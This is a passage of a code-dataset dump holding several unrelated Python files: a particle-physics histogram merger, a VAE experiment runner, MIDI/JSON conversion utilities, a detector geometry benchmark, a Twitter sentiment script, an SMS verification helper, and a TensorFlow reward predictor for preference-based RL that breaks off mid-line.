'colRec_1Up'] = {}\n recoRunII[dist + 'colRec_1Down'] = {} \n recoRunII[dist + 'colRec_2Up'] = {}\n recoRunII[dist + 'colRec_2Down'] = {}\n recoRunII[dist + 'colRec_3Up'] = {}\n recoRunII[dist + 'colRec_3Down'] = {}\n \n for proc in recoRunII[dist].keys():\n q2dict16 = dict((var, reco16[dist + var][proc].Clone()) for var in ['']+['q2_' + i for i in ('Ru', 'Fu', 'RFu', 'Rd', 'Fd', 'RFd')])\n pdfdict16 = dict((var, reco16[dist + var][proc].Clone()) for var in ['']+['pdf_' + str(i) for i in range(0, 100)])\n q2dict17 = dict((var, reco17[dist + var][proc].Clone()) for var in ['']+['q2_' + i for i in ('Ru', 'Fu', 'RFu', 'Rd', 'Fd', 'RFd')])\n pdfdict17 = dict((var, reco17[dist + var][proc].Clone()) for var in ['']+['pdf_' + str(i) for i in range(0, 100)])\n q2dict18 = dict((var, reco18[dist + var][proc].Clone()) for var in ['']+['q2_' + i for i in ('Ru', 'Fu', 'RFu', 'Rd', 'Fd', 'RFd')])\n pdfdict18 = dict((var, reco18[dist + var][proc].Clone()) for var in ['']+['pdf_' + str(i) for i in range(0, 100)])\n\n \n plq2Up16, plq2Down16 = getEnv(q2dict16)\n rmspdf16 = getRMS(pdfdict16)\n\n plq2Up17, plq2Down17 = getEnv(q2dict17)\n rmspdf17 = getRMS(pdfdict17)\n\n plq2Up18, plq2Down18 = getEnv(q2dict18)\n rmspdf18 = getRMS(pdfdict18)\n\n recoRunII[dist + 'fdpUp'][proc] = recoRunII[dist][proc].Clone()\n recoRunII[dist + 'fdpDown'][proc] = recoRunII[dist][proc].Clone()\n recoRunII[dist + '2qUp'][proc] = recoRunII[dist][proc].Clone()\n recoRunII[dist + '2qDown'][proc] = recoRunII[dist][proc].Clone()\n\n recoRunII[dist + '2qUp'][proc].Add(plq2Up16)\n recoRunII[dist + '2qDown'][proc].Add(plq2Down16)\n recoRunII[dist + 'fdpUp'][proc].Add(rmspdf16)\n recoRunII[dist + 'fdpDown'][proc].Add(rmspdf16, -1)\n\n recoRunII[dist + '2qUp'][proc].Add(plq2Up17)\n recoRunII[dist + '2qDown'][proc].Add(plq2Down17)\n recoRunII[dist + 'fdpUp'][proc].Add(rmspdf17)\n recoRunII[dist + 'fdpDown'][proc].Add(rmspdf17, -1)\n\n recoRunII[dist + '2qUp'][proc].Add(plq2Up18)\n recoRunII[dist + '2qDown'][proc].Add(plq2Down18)\n recoRunII[dist + 'fdpUp'][proc].Add(rmspdf18)\n recoRunII[dist + 'fdpDown'][proc].Add(rmspdf18, -1)\n\n\n colrec_1_RII = reco16[dist + 'colRec_1'][proc].Clone()\n colrec_1_RII.Add(reco17[dist + 'colRec_1'][proc])\n colrec_1_RII.Add(reco18[dist + 'colRec_1'][proc])\n\n recoRunII[dist + 'colRec_1Up'][proc] = colrec_1_RII.Clone()\n recoRunII[dist + 'colRec_1Down'][proc] = invertVar(recoRunII[dist][proc], colrec_1_RII).Clone()\n\n colrec_2_RII = reco16[dist + 'colRec_2'][proc].Clone()\n colrec_2_RII.Add(reco17[dist + 'colRec_2'][proc])\n colrec_2_RII.Add(reco18[dist + 'colRec_2'][proc])\n\n recoRunII[dist + 'colRec_2Up'][proc] = colrec_2_RII.Clone()\n recoRunII[dist + 'colRec_2Down'][proc] = invertVar(recoRunII[dist][proc], colrec_2_RII).Clone()\n\n colrec_3_RII = reco16[dist + 'colRec_3'][proc].Clone()\n colrec_3_RII.Add(reco17[dist + 'colRec_3'][proc])\n colrec_3_RII.Add(reco18[dist + 'colRec_3'][proc])\n\n recoRunII[dist + 'colRec_3Up'][proc] = colrec_3_RII.Clone()\n recoRunII[dist + 'colRec_3Down'][proc] = invertVar(recoRunII[dist][proc], colrec_3_RII).Clone()\n\n del recoRunII[dist + 'colRec_1']\n del recoRunII[dist + 'colRec_2']\n del recoRunII[dist + 'colRec_3']\n for var in ['q2_' + i for i in ('Ru', 'Fu', 'RFu', 'Rd', 'Fd', 'RFd')]:\n del recoRunII[dist + var]\n for var in ['pdf_' + str(i) for i in range(0, 100)]:\n del recoRunII[dist + var]\n\n\n\n for fac, direc in [(-1., 'Down'), (1., 'Up')]:\n recoRunII[dist + 'lumi_1718' + direc] = {}\n recoRunII[dist + 'lumi_2016' + direc] = {}\n recoRunII[dist + 
'lumi_2017' + direc] = {}\n recoRunII[dist + 'lumi_2018' + direc] = {}\n recoRunII[dist + 'lumi_3Ycorr' + direc] = {}\n\n for proc in recoRunII[dist].keys():\n if proc.count('data'): continue\n factor = fac\n if proc.count('nonprompt'): factor = 0. #maybe change to \"estimate\", see if that checks out though\n\n for lumunc in ['lumi_1718' , 'lumi_2016' , 'lumi_2017' , 'lumi_2018' , 'lumi_3Ycorr']:\n l16 = reco16[dist][proc].Clone()\n l17 = reco17[dist][proc].Clone()\n l18 = reco18[dist][proc].Clone()\n\n l16.Scale(1. + factor * lumiUnc[lumunc]['16'])\n l17.Scale(1. + factor * lumiUnc[lumunc]['17'])\n l18.Scale(1. + factor * lumiUnc[lumunc]['18'])\n\n # l16.Scale( (1. + lumiUnc[lumunc]['16'])**factor )\n # l17.Scale( (1. + lumiUnc[lumunc]['17'])**factor )\n # l18.Scale( (1. + lumiUnc[lumunc]['18'])**factor )\n\n l16.Add(l17)\n l16.Add(l18)\n recoRunII[dist + lumunc + direc][proc] = l16.Clone()\n\n # data skippen\n # nonprompt niet scalen maar wel writen\n\n\n\n\n\n # lumi_1718 lnN - 1.006 1.002 \n # lumi_2016 lnN 1.009 - - \n # lumi_2017 lnN - 1.02 - \n # lumi_2018 lnN - - 1.015 \n # lumi_3Ycorr lnN 1.006 1.009 1.02 \n\n pickle.dump(recoRunII, file('/storage_mnt/storage/user/gmestdac/public_html/ttG/all/phoCBfull-niceEstimDD-RE-merged/' + channel + '/llg-mll20-deepbtag1p-offZ-llgNoZ-photonPt20/' + dist + '.pkl', 'w'))\n except Exception as e:\n log.info(e)\n log.info('failed for distribution '+ dist)","sub_path":"plots/yearMerger.py","file_name":"yearMerger.py","file_ext":"py","file_size_in_byte":11884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"145370791","text":"# %%\nimport runner as runner\nrunner_instance = runner.Runner(dataset_key=runner.Dataset.CALTECH, architecture=runner.Architecture.HVAE, prior_configuration=runner.PriorConfiguration.VAMPGEN, n_epochs=2,root=\"../exports\")\nrunner_instance.run()\n# %%\nimport runner as runner\nrunner_instance = runner.Runner(dataset_key=runner.Dataset.CALTECH, architecture=runner.Architecture.VANILLA, prior_configuration=runner.PriorConfiguration.SG, n_epochs=2,root=\"../exports\")\nrunner_instance.reload_existing_model()\n\n# %%\nimport matplotlib.pyplot as plt\nmodel = runner_instance.model\nprior = model.get_prior()\nencoder = model.get_encoder()\ndecoder = model.get_decoder()\ngenerated_img = decoder(prior.sample(1)).mean()\n\nplt.imshow(generated_img[0])\n\n# %%\nimport sys\nsys.path.append('../')\nimport utils.datasets as data\ncalt = data.get_dataset(data.DatasetKey.CALTECH)\ncalt['X'].shape\nnp.reshape(calt['X'], (-1, 28, 28)).shape\n# %%\nimport numpy as np\ncalt['X'].shape\nplt.imshow(calt['X'][np.random.randint(5000)].reshape(28,28), cmap = \"Greys\")\n# %%\nnp.random.randint(52000\n)\n# %%\nplt.imshow(runner_instance.x_train[4])","sub_path":"experiments/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"18291405","text":"import json\nfrom mido import MidiFile, MidiTrack, MetaMessage, Message\n\ndef dumpMidi(midi, prefix, charset='utf-8'):\n midi = MidiFile(midi, charset=charset)\n tempo = 500000\n bar = 4\n\n for idx, t in enumerate(midi.tracks):\n outs = dict()\n keys = dict()\n now = 0.0\n for m in t:\n now += m.time\n if m.type == 'set_tempo':\n tempo = m.tempo\n elif m.type == 'time_signature':\n bar = m.numerator\n if m.type != 'note_on' and m.type != 'note_off':\n continue\n ch = m.channel\n if not ch in outs:\n outs[ch] = 
list()\n keys[ch] = dict()\n if m.type == 'note_off' or m.velocity == 0:\n if m.note in keys[ch]:\n st = keys[ch][m.note]\n if now - st > 0.01 * midi.ticks_per_beat:\n note = { \"offset\": st / midi.ticks_per_beat, \"note\": m.note, \"length\": (now - st) / midi.ticks_per_beat }\n outs[ch].append(note)\n keys[ch].pop(m.note)\n else:\n if m.note in keys[ch]:\n st = keys[ch][m.note]\n note = { \"offset\": st / midi.ticks_per_beat, \"note\": m.note, \"length\": (now - st) / midi.ticks_per_beat }\n outs[ch].append(note)\n keys[ch][m.note] = now\n for ch, v in outs.items():\n path = prefix + '-' + str(idx) + '-' + str(ch) + '.json'\n with open(path, 'w') as f:\n json.dump({\n 'bpm': 60000000.0 / tempo,\n 'bar': bar, 'notes': v\n }, f, indent=2)\n\ndef writeMidi(track):\n mid = MidiFile()\n midiTrack = MidiTrack()\n mid.tracks.append(midiTrack)\n tpb = mid.ticks_per_beat\n\n midiTrack.append(MetaMessage('set_tempo', tempo=round(60000000.0 / track['bpm'])))\n midiTrack.append(MetaMessage('time_signature', numerator=track['bar']))\n events = [ ('note_on', n['note'], n['offset']) for n in track['notes'] ]\n events.extend( ('note_off', n['note'], n['offset'] + n['length']) for n in track['notes'] )\n events.sort(key=lambda x: x[2])\n now = 0\n\n for e in events:\n time = round((e[2] - now) * tpb)\n midiTrack.append(Message(e[0], note=int(e[1]), velocity=127, time=time))\n now = e[2]\n\n return mid\n\ndef loadTrack(path):\n with open(path, 'r') as f:\n ret = json.load(f)\n return ret\n","sub_path":"pymad/midi.py","file_name":"midi.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"654053061","text":"\"\"\"\nDistributed under the terms of the BSD 3-Clause License.\n\nThe full license is in the file LICENSE, distributed with this software.\n\nAuthor: Jun Zhu \nCopyright (C) European X-Ray Free-Electron Laser Facility GmbH.\nAll rights reserved.\n\"\"\"\nimport os.path as osp\nimport time\n\nimport numpy as np\n\n\n_data_sources = [(np.uint16, 'raw'), (np.float32, 'calibrated')]\n\n_geom_path = osp.join(osp.dirname(osp.abspath(__file__)), \"../extra_foam/geometries\")\n\n\ndef _benchmark_1m_imp(geom_fast_cls, geom_cls, geom_file, quad_positions=None):\n\n for from_dtype, from_str in _data_sources:\n n_pulses = 64\n modules = np.ones((n_pulses,\n geom_fast_cls.n_modules,\n geom_fast_cls.module_shape[0],\n geom_fast_cls.module_shape[1]), dtype=from_dtype)\n\n # stack only\n\n geom = geom_fast_cls()\n out = np.full((n_pulses, *geom.assembledShape()), np.nan, dtype=np.float32)\n t0 = time.perf_counter()\n geom.position_all_modules(modules, out)\n dt_foam_stack = time.perf_counter() - t0\n\n # assemble with geometry and quad position\n\n if quad_positions is not None:\n geom = geom_fast_cls.from_h5_file_and_quad_positions(geom_file, quad_positions)\n else:\n geom = geom_fast_cls.from_crystfel_geom(geom_file)\n out = np.full((n_pulses, *geom.assembledShape()), np.nan, dtype=np.float32)\n t0 = time.perf_counter()\n geom.position_all_modules(modules, out)\n dt_foam = time.perf_counter() - t0\n\n # assemble with geometry and quad position in EXtra-geom\n\n if quad_positions is not None:\n geom = geom_cls.from_h5_file_and_quad_positions(geom_file, quad_positions)\n else:\n geom = geom_cls.from_crystfel_geom(geom_file)\n out = geom.output_array_for_position_fast((n_pulses,))\n t0 = time.perf_counter()\n geom.position_all_modules(modules, out=out)\n dt_geom = time.perf_counter() - t0\n\n print(f\"\\nposition all 
modules for {geom_cls.__name__} (from {from_str} data) - \\n\"\n f\" dt (foam stack only): {dt_foam_stack:.4f}, dt (foam): {dt_foam:.4f}, \"\n f\"dt (geom): {dt_geom:.4f}\")\n\n\ndef benchmark_dssc_1m():\n from extra_foam.geometries import DSSC_1MGeometryFast\n from extra_foam.geometries import DSSC_1MGeometry\n\n geom_file = osp.join(_geom_path, \"dssc_geo_june19.h5\")\n quad_positions = [\n [-124.100, 3.112],\n [-133.068, -110.604],\n [ 0.988, -125.236],\n [ 4.528, -4.912]\n ]\n\n _benchmark_1m_imp(DSSC_1MGeometryFast, DSSC_1MGeometry, geom_file, quad_positions)\n\n\ndef benchmark_lpd_1m():\n from extra_foam.geometries import LPD_1MGeometryFast\n from extra_foam.geometries import LPD_1MGeometry\n\n geom_file = osp.join(_geom_path, \"lpd_mar_18_axesfixed.h5\")\n quad_positions = [\n [ 11.4, 299],\n [-11.5, 8],\n [254.5, -16],\n [278.5, 275]\n ]\n\n _benchmark_1m_imp(LPD_1MGeometryFast, LPD_1MGeometry, geom_file, quad_positions)\n\n\ndef benchmark_agipd_1m():\n from extra_foam.geometries import AGIPD_1MGeometryFast\n from extra_foam.geometries import AGIPD_1MGeometry\n\n geom_file = osp.join(_geom_path, \"agipd_mar18_v11.geom\")\n\n _benchmark_1m_imp(AGIPD_1MGeometryFast, AGIPD_1MGeometry, geom_file)\n\n\nif __name__ == \"__main__\":\n print(\"*\" * 80)\n print(\"Benchmark geometry\")\n print(\"*\" * 80)\n\n benchmark_dssc_1m()\n\n benchmark_lpd_1m()\n\n benchmark_agipd_1m()\n","sub_path":"benchmarks/benchmark_geometry.py","file_name":"benchmark_geometry.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"570797055","text":"from textblob import TextBlob\r\nimport tweepy\r\nimport sys\r\n\r\nmykeys = open(\"TwitterAPI/API_KEYS/twitterkeys.txt\", \"r\").read().splitlines()\r\n\r\napi_key = mykeys[0]\r\napi_key_secret = mykeys[1]\r\naccess_token = mykeys[2]\r\naccess_token_secret = mykeys[3]\r\n\r\nauth_handler = tweepy.OAuthHandler(consumer_key=api_key, consumer_secret=api_key_secret)\r\nauth_handler.set_access_token(access_token, access_token_secret)\r\n\r\napi = tweepy.API(auth_handler)\r\n\r\nsearch_term = \"shit\"\r\ntweet_amount = 300\r\n\r\ntweets = tweepy.Cursor(api.search, q=search_term, lang=\"en\").items(tweet_amount)\r\n\r\n\r\npositive = 0\r\nneutral = 0\r\nnegative = 0\r\n\r\npolarity = 0\r\n\r\nfor tweet in tweets:\r\n final_text = tweet.text.replace(\"RT\", \"\")\r\n if final_text.startswith(\" @\"):\r\n position = final_text.index(\":\")\r\n final_text = final_text[position+2:]\r\n if final_text.startswith(\"@\"):\r\n position = final_text.index(\" \")\r\n final_text = final_text[position+2:]\r\n\r\n analysis = TextBlob(final_text)\r\n tweet_polarity = analysis.polarity\r\n if tweet_polarity > 0:\r\n positive += 1\r\n elif tweet_polarity < 0:\r\n negative += 1\r\n else:\r\n neutral += 1\r\n polarity += tweet_polarity\r\n\r\n polarity += analysis.polarity\r\n print(final_text)\r\n\r\n\r\nprint(polarity)\r\nprint(f\"Amount of postitive tweets: {positive}\")\r\nprint(f\"Amount of neutral tweets: {neutral}\")\r\nprint(f\"Amount of negative tweets: {negative}\")","sub_path":"Python/polarity_checker.py","file_name":"polarity_checker.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"196250247","text":"from utils.baseUtils import *\nfrom utils.baseHttp import ConfigHttp\nreq = ConfigHttp()\n\"\"\"\n获取发送验证码的方法\n@:param action是注册或登录 \n@:param ftype是手机号或邮箱类型\n@:param account是手机号或邮箱\n@:param 
countrycode是手机号国家编码\n\"\"\"\ndef getSendverify(logger,action ,ftype, account, countrycode):\n logger.info(\"==========获取发送验证码 START=======\")\n req.httpname = \"KPTEST\"\n url = \"/account/sendverify?no_check=1\"\n data = {\n \"type\": ftype,\n \"action\": action,\n \"account\": account,\n \"country_code\": countrycode,\n \"version\": \"3.11.2\",\n \"system\": \"3\",\n \"device_model\": \"HUAWEI P10\",\n \"v\": \"3.11.2\",\n \"channel\": \"5\"\n }\n req.set_data(data)\n req.set_url(url)\n response = req.post()\n\n try:\n retcode = response[\"code\"]\n if retcode==0:\n logger.info(\"发送短信成功\")\n elif retcode==10019:\n logger.info(\"注册账号已经存在\")\n else:\n logger.info(\"发送短信失败\")\n logger.info(\"==========获取发送验证码 end=======\")\n return retcode\n\n except Exception as ex:\n logger.info(\"==========获取发送验证码 失败=======\")\n print(ex)\n print(\"获取发送验证码错误!\")\n\n\n","sub_path":"datadao/sendverify.py","file_name":"sendverify.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"405909763","text":"import logging\nimport os.path as osp\nimport time\n\nimport easy_tf_log\nimport numpy as np\nimport tensorflow as tf\nfrom numpy.testing import assert_equal\n\nfrom drlhp.pref_db import PrefDB\nfrom drlhp.reward_predictor_core_network import net_cnn\nfrom drlhp.drlhp_utils import LimitedRunningStat, RunningStat\nfrom utils import batch_iter\n\nMIN_L2_REG_COEF = 0.1\n\n\nclass RewardPredictor:\n\n def __init__(self, obs_shape, network, network_args, r_std, lr=1e-4, log_dir=None, seed=None):\n self.obs_shape = obs_shape\n graph = tf.Graph()\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n self.sess = tf.Session(graph=graph, config=config)\n\n with graph.as_default():\n if seed is not None:\n tf.set_random_seed(seed)\n self.l2_reg_coef = MIN_L2_REG_COEF\n self.rps = [RewardPredictorNetwork(core_network=network,\n network_args=network_args,\n obs_shape=obs_shape,\n lr=lr)]\n self.init_op = tf.global_variables_initializer()\n # Why save_relative_paths=True?\n # So that the plain-text 'checkpoint' file written uses relative paths,\n # which seems to be needed in order to avoid confusing saver.restore()\n # when restoring from FloydHub runs.\n self.saver = tf.train.Saver(max_to_keep=2, save_relative_paths=True)\n self.summaries = self.add_summary_ops()\n\n self.train_writer = tf.summary.FileWriter(\n osp.join(log_dir, 'reward_predictor', 'train'), flush_secs=5)\n self.test_writer = tf.summary.FileWriter(\n osp.join(log_dir, 'reward_predictor', 'test'), flush_secs=5)\n\n self.n_steps = 0\n self.r_norm_limited = LimitedRunningStat()\n self.r_norm = RunningStat(shape=[])\n self.r_std = r_std\n\n self.logger = easy_tf_log.Logger()\n self.logger.set_log_dir(osp.join(log_dir, 'reward_predictor', 'misc'))\n self.reward_call_n = 0\n\n self.log_interval = 20\n\n self.init_network()\n\n\n def add_summary_ops(self):\n summary_ops = []\n\n for pred_n, rp in enumerate(self.rps):\n name = 'reward_predictor/accuracy_{}'.format(pred_n)\n op = tf.summary.scalar(name, rp.accuracy)\n summary_ops.append(op)\n name = 'reward_predictor/loss_{}'.format(pred_n)\n op = tf.summary.scalar(name, rp.loss)\n summary_ops.append(op)\n l2_reg_losses = [rp.l2_reg_loss for rp in self.rps]\n mean_reg_loss = tf.reduce_mean(l2_reg_losses)\n op = tf.summary.scalar('reward_predictor/l2_loss_mean', mean_reg_loss)\n summary_ops.append(op)\n\n summaries = tf.summary.merge(summary_ops)\n\n return summaries\n\n def init_network(self, 
load_ckpt_dir=None):\n if load_ckpt_dir:\n ckpt_file = tf.train.latest_checkpoint(load_ckpt_dir)\n if ckpt_file is None:\n msg = \"No reward predictor checkpoint found in '{}'\".format(\n load_ckpt_dir)\n raise FileNotFoundError(msg)\n self.saver.restore(self.sess, ckpt_file)\n print(\"Loaded reward predictor checkpoint from '{}'\".format(ckpt_file))\n else:\n self.sess.run(self.init_op)\n\n def save(self, path):\n ckpt_name = self.saver.save(self.sess, path)\n print(\"Saved reward predictor checkpoint to '{}'\".format(ckpt_name))\n\n def load(self, path):\n self.saver.restore(self.sess, path)\n print(\"Restored reward predictor from checkpoint '{}'\".format(path))\n\n def raw_rewards(self, obs):\n \"\"\"\n Return (unnormalized) reward for each frame of a single segment\n from each member of the ensemble.\n \"\"\"\n assert_equal(obs.shape[1:], self.obs_shape)\n n_steps = obs.shape[0]\n feed_dict = self.get_feed_dict()\n for rp in self.rps:\n feed_dict[rp.training] = False\n feed_dict[rp.s1] = [obs]\n # This will return nested lists of sizes n_preds x 1 x nsteps\n # (x 1 because of the batch size of 1)\n rs = self.sess.run([rp.r1 for rp in self.rps], feed_dict)\n rs = np.array(rs)\n # Get rid of the extra x 1 dimension\n rs = rs[:, 0, :]\n n_preds = 1\n assert_equal(rs.shape, (n_preds, n_steps))\n return rs\n\n def reward(self, obs):\n \"\"\"\n Return (normalized) reward for each frame of a single segment.\n\n (Normalization involves normalizing the rewards from each member of the\n ensemble separately, then averaging the resulting rewards across all\n ensemble members.)\n \"\"\"\n assert_equal(obs.shape[1:], self.obs_shape)\n n_steps = obs.shape[0]\n\n # Get unnormalized rewards\n\n ensemble_rs = self.raw_rewards(obs)\n logging.debug(\"Unnormalized rewards:\\n%s\", ensemble_rs)\n\n # Normalize rewards\n\n # Note that we implement this here instead of in the network itself\n # because:\n # * It's simpler not to do it in TensorFlow\n # * Preference prediction doesn't need normalized rewards. 
Only\n # rewards sent to the the RL algorithm need to be normalized.\n # So we can save on computation.\n\n # Page 4:\n # \"We normalized the rewards produced by r^ to have zero mean and\n # constant standard deviation.\"\n # Page 15: (Atari)\n # \"Since the reward predictor is ultimately used to compare two sums\n # over timesteps, its scale is arbitrary, and we normalize it to have\n # a standard deviation of 0.05\"\n # Page 5:\n # \"The estimate r^ is defined by independently normalizing each of\n # these predictors...\"\n\n # We want to keep track of running mean/stddev for each member of the\n # ensemble separately, so we have to be a little careful here.\n n_preds = 1\n assert_equal(ensemble_rs.shape, (n_preds, n_steps))\n ensemble_rs = ensemble_rs.transpose()\n assert_equal(ensemble_rs.shape, (n_steps, n_preds))\n for ensemble_rs_step in ensemble_rs:\n self.r_norm_limited.push(ensemble_rs_step[0])\n self.r_norm.push(ensemble_rs_step[0])\n ensemble_rs -= self.r_norm.mean\n ensemble_rs /= (self.r_norm.std + 1e-12)\n ensemble_rs *= self.r_std\n ensemble_rs = ensemble_rs.transpose()\n assert_equal(ensemble_rs.shape, (n_preds, n_steps))\n\n self.reward_call_n += 1\n if self.reward_call_n % 1000 == 0:\n self.logger.logkv('reward_predictor/r_norm_mean_recent', self.r_norm_limited.mean)\n self.logger.logkv('reward_predictor/r_norm_std_recent', self.r_norm_limited.std)\n self.logger.logkv('reward_predictor/r_norm_mean', self.r_norm.mean)\n self.logger.logkv('reward_predictor/r_norm_std', self.r_norm.std)\n\n # \"...and then averaging the results.\"\n rs = np.mean(ensemble_rs, axis=0)\n assert_equal(rs.shape, (n_steps,))\n logging.debug(\"After ensemble averaging:\\n%s\", rs)\n\n return rs\n\n def train(self, prefs_train: PrefDB, prefs_val: PrefDB, val_interval, verbose=True):\n \"\"\"\n Train all ensemble members for one epoch.\n \"\"\"\n\n if verbose:\n print(\"Training/testing with %d/%d preferences\" % (len(prefs_train), len(prefs_val)))\n\n start_steps = self.n_steps\n start_time = time.time()\n\n train_losses = []\n val_losses = []\n for _, batch in enumerate(batch_iter(prefs_train.prefs, batch_size=32, shuffle=True)):\n train_losses.append(self.train_step(batch, prefs_train))\n self.n_steps += 1\n\n if self.n_steps and self.n_steps % val_interval == 0 and len(prefs_val) != 0:\n val_losses.append(self.val_step(prefs_val))\n\n if val_losses:\n train_loss = np.mean(train_losses)\n val_loss = np.mean(val_losses)\n ratio = val_loss / train_loss\n self.logger.logkv('reward_predictor/test_train_loss_ratio', ratio)\n if ratio > 1.3:\n self.l2_reg_coef *= 1.5\n elif ratio < 1.3:\n self.l2_reg_coef = max(self.l2_reg_coef / 1.5, MIN_L2_REG_COEF)\n self.logger.logkv('reward_predictor/reg_coef', self.l2_reg_coef)\n\n end_time = time.time()\n end_steps = self.n_steps\n rate = (end_steps - start_steps) / (end_time - start_time)\n self.logger.logkv('reward_predictor/training_steps_per_second', rate)\n if verbose:\n print(\"Done training DRLHP!\")\n\n def train_step(self, batch, prefs_train):\n s1s = [prefs_train.segments[k1] for k1, k2, pref, in batch]\n s2s = [prefs_train.segments[k2] for k1, k2, pref, in batch]\n prefs = [pref for k1, k2, pref, in batch]\n feed_dict = self.get_feed_dict()\n for rp in self.rps:\n feed_dict[rp.s1] = s1s\n feed_dict[rp.s2] = s2s\n feed_dict[rp.pref] = prefs\n feed_dict[rp.training] = True\n # Why do we only check the loss from the first reward predictor?\n # As a quick hack to get adaptive L2 regularization working quickly,\n # assuming we're only using one reward 
predictor.\n ops = [self.rps[0].loss, self.summaries, [rp.train for rp in self.rps]]\n loss, summaries, _ = self.sess.run(ops, feed_dict)\n if self.n_steps % self.log_interval == 0:\n self.train_writer.add_summary(summaries, self.n_steps)\n return loss\n\n def val_step(self, prefs_val):\n val_batch_size = 32\n if len(prefs_val.prefs) <= val_batch_size:\n batch = prefs_val.prefs\n else:\n idxs = np.random.choice(len(prefs_val.prefs), val_batch_size, replace=False)\n batch = [prefs_val.prefs[i] for i in idxs]\n s1s = [prefs_val.segments[k1] for k1, k2, pref, in batch]\n s2s = [prefs_val.segments[k2] for k1, k2, pref, in batch]\n prefs = [pref for k1, k2, pref, in batch]\n feed_dict = self.get_feed_dict()\n for rp in self.rps:\n feed_dict[rp.s1] = s1s\n feed_dict[rp.s2] = s2s\n feed_dict[rp.pref] = prefs\n feed_dict[rp.training] = False\n loss, summaries = self.sess.run([self.rps[0].loss, self.summaries], feed_dict)\n if self.n_steps % self.log_interval == 0:\n self.test_writer.add_summary(summaries, self.n_steps)\n return loss\n\n def reset_normalisation(self):\n self.r_norm_limited = LimitedRunningStat()\n self.r_norm = RunningStat(shape=1)\n\n def get_feed_dict(self):\n feed_dict = {}\n for rp in self.rps:\n feed_dict[rp.l2_reg_coef] = self.l2_reg_coef\n return feed_dict\n\n\nclass RewardPredictorNetwork:\n \"\"\"\n Predict the reward that a human would assign to each frame of\n the input trajectory, trained using the human's preferences between\n pairs of trajectories.\n\n Network inputs:\n - s1/s2 Trajectory pairs\n - pref Preferences between each pair of trajectories\n Network outputs:\n - r1/r2 Reward predicted for each frame\n - rs1/rs2 Reward summed over all frames for each trajectory\n - pred Predicted preference\n \"\"\"\n\n def __init__(self, core_network, network_args, obs_shape, lr):\n training = tf.placeholder(tf.bool)\n obs_shape = tuple(obs_shape)\n # Each element of the batch is one trajectory segment.\n # (Dimensions are n segments x n frames per segment x ...)\n s1 = tf.placeholder(tf.float32, shape=(None, None) + obs_shape)\n s2 = tf.placeholder(tf.float32, shape=(None, None) + obs_shape)\n # For each trajectory segment, there is one human judgement.\n pref = tf.placeholder(tf.float32, shape=(None, 2))\n\n # Concatenate trajectory segments so that the first dimension is just\n # frames\n # (necessary because of conv layer's requirements on input shape)\n s1_unrolled = tf.reshape(s1, (-1,) + obs_shape)\n s2_unrolled = tf.reshape(s2, (-1,) + obs_shape)\n\n l2_reg_coef = tf.placeholder(tf.float32)\n l2_reg = tf.contrib.layers.l2_regularizer(scale=l2_reg_coef)\n # Predict rewards for each frame in the unrolled batch\n _r1 = core_network(s=s1_unrolled, reuse=False, training=training, regularizer=l2_reg,\n **network_args)\n _r2 = core_network(s=s2_unrolled, reuse=True, training=training, regularizer=l2_reg,\n **network_args)\n\n # Shape should be 'unrolled batch size'\n # where 'unrolled batch size' is 'batch size' x 'n frames per segment'\n c1 = tf.assert_rank(_r1, 1)\n c2 = tf.assert_rank(_r2, 1)\n with tf.control_dependencies([c1, c2]):\n # Re-roll to 'batch size' x 'n frames per segment'\n __r1 = tf.reshape(_r1, tf.shape(s1)[0:2])\n __r2 = tf.reshape(_r2, tf.shape(s2)[0:2])\n # Shape should be 'batch size' x 'n frames per segment'\n c1 = tf.assert_rank(__r1, 2)\n c2 = tf.assert_rank(__r2, 2)\n with tf.control_dependencies([c1, c2]):\n r1 = __r1\n r2 = __r2\n\n # Sum rewards over all frames in each segment\n _rs1 = tf.reduce_sum(r1, axis=1)\n _rs2 = tf.reduce_sum(r2, 
axis=1)\n # Shape should be 'batch size'\n c1 = tf.assert_rank(_rs1, 1)\n c2 = tf.assert_rank(_rs2, 1)\n with tf.control_dependencies([c1, c2]):\n rs1 = _rs1\n rs2 = _rs2\n\n # Predict preferences for each segment\n _rs = tf.stack([rs1, rs2], axis=1)\n # Shape should be 'batch size' x 2\n c1 = tf.assert_rank(_rs, 2)\n with tf.control_dependencies([c1]):\n rs = _rs\n _pred = tf.nn.softmax(rs)\n # Shape should be 'batch_size' x 2\n c1 = tf.assert_rank(_pred, 2)\n with tf.control_dependencies([c1]):\n pred = _pred\n\n preds_correct = tf.equal(tf.argmax(pref, 1), tf.argmax(pred, 1))\n accuracy = tf.reduce_mean(tf.cast(preds_correct, tf.float32))\n\n _loss = tf.nn.softmax_cross_entropy_with_logits_v2(labels=pref,\n logits=rs)\n # Shape should be 'batch size'\n c1 = tf.assert_rank(_loss, 1)\n with tf.control_dependencies([c1]):\n loss = tf.reduce_sum(_loss)\n\n l2_reg_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n # l2_reg_losses is a list of L2 norms - one for each weight layer\n # (where each L2 norm is just a scalar - so this is a list of scalars)\n # Why do we use add_n rather than reduce_sum?\n # reduce_sum is for when you have e.g. a matrix and you want to sum over one row.\n # If you want to sum over elements of a list, you use add_n.\n l2_reg_loss = tf.add_n(l2_reg_losses)\n loss += l2_reg_loss\n\n if core_network == net_cnn:\n batchnorm_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n optimizer_dependencies = batchnorm_update_ops\n else:\n optimizer_dependencies = []\n\n with tf.control_dependencies(optimizer_dependencies):\n train = tf.train.AdamOptimizer(learning_rate=lr).minimize(loss)\n\n # Inputs\n self.training = training\n self.s1 = s1\n self.s2 = s2\n self.pref = pref\n self.l2_reg_coef = l2_reg_coef\n\n # Outputs\n self.r1 = r1\n self.r2 = 